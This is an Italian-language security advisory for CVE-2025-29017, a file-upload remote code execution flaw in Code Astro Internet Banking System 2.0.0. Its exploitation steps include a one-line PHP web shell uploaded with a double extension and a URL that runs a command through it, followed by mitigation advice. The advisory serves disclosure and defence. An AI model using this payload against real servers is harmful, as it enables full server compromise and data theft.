CVE-2025-29017 - Esecuzione di codice remoto tramite caricamento immagine profilo in Internet Banking System 2.0.0
Descrizione
Esiste una vulnerabilità di Esecuzione di Codice Remoto (RCE) in Code Astro Internet Banking System 2.0.0 a causa di una convalida impropria del caricamento dei file nel parametro profile_pic all'interno di pages_view_client.php. Gli attaccanti possono eludere i controlli di sicurezza modificando la richiesta di caricamento, portando a esecuzione di codice arbitrario.
Componente Affetto
- Parametro
profile_pic in pages_view_client.php
- La funzione di caricamento consente l'esecuzione di file PHP dannosi
Passaggi di Sfruttamento
- Navigare alle impostazioni del profilo utente e selezionare una nuova immagine del profilo.


- Intercettare la richiesta di caricamento dell'immagine del profilo utilizzando uno strumento come Burp Suite.

- Modificare il file con doppia estensione (.jpeg.php), modificare l'intestazione Content-Type in application/x-php e aggiungere codice PHP malevolo:
<?php system($_GET['cmd']); ?>


- È possibile verificare se il file è stato caricato in /admin/dist/img/:
http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt

Impatto
- Compromissione totale del server
- Furto di dati
- Escalation dei privilegi
Mitigazione
- Limitare i caricamenti di file solo a formati immagine e verificare i tipi MIME.
- Sanificare i nomi dei file e bloccare i file contenenti codice eseguibile.
- Memorizzare i file caricati al di fuori della directory web root.
Riferimenti
- OWASP File Upload Security